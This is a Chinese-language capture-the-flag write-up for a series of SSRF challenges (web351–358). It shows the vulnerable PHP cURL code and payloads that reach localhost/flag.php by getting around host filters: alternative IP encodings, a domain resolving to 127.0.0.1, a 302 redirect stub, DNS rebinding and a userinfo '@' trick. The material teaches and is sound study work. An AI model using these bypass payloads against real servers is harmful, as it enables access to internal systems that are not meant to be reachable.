SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
web351
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化 cURL 会话
curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出。
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
$result=curl_exec($ch);//执行 cURL 会话
curl_close($ch);//关闭 cURL 会话
echo ($result);
?>
payload: url=127.0.0.1/flag.php
web352
parse_url()函数会解析url并返回关联数组
$url = 'http://username:password@hostname:9090/path?arg=value#anchor';
var_dump(parse_url($url));
array(8) {
["scheme"]=>
string(4) "http"
["host"]=>
string(8) "hostname"
["port"]=>
int(9090)
["user"]=>
string(8) "username"
["pass"]=>
string(8) "password"
["path"]=>
string(5) "/path"
["query"]=>
string(9) "arg=value"
["fragment"]=>
string(6) "anchor"
}
这关看似使用了正则匹配preg_match,但缺少参数,没啥用
url=http://127.0.0.1/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://0x7f.0.0.1/flag.php //16进制
url=http://0177.0.0.1/flag.php //8进制
url=http://2130706433/flag.php //10进制整数格式
url=http://0x7F000001/flag.php //16进制整数格式
url=http://127.0.1/flag.php
url=http://127.1/flag.php
web353
直接绕过
url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://127.1/flag.php
web354
这题把0和1都屏蔽了
http(s)://sudo.cc/指向127.0.0.1
url=http://sudo.cc/flag.php
也可以用自己的域名,让他解析到127.0.0.1来用
<?php header("Location: http://127.0.0.1/flag.php");
# POST: url=http://your-domain/ssrf.php
web355
多了一个限制让host位数小于5
url=http://0/flag.php
url=http://127.1/flag.php
web356
限制host位数小于3
url=http://0/flag.php
web357
利用302跳转和dns重绑定都可以。
<?php
header("Location:http://127.0.0.1/flag.php");
然后payload写自己的这个地址就可以了。
payload:http://xxx/a.php
2、在这个网站注册一个账号http://ceye.io/
,然后会给你分配一个域名,修改成如下的内容,第一个随便填,第二个写127.0.0.1
/132206.png)
多试几次就可以
web358
url必须以http://ctf.
开头,必须以show结尾。
以show结尾比较好办,要么#show,要么?a=show这样的都可以。
以http://ctf.
开头的话,加上一个@127.0.0.1就可以绕过了,这样parse_url解析出来的host是127.0.0.1,考虑到ftp://user[:pass]@ip[:port]/path
,因此前面的ctf.会被解析成user。
url=http://ctf.@127.0.0.1/flag.php#show
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。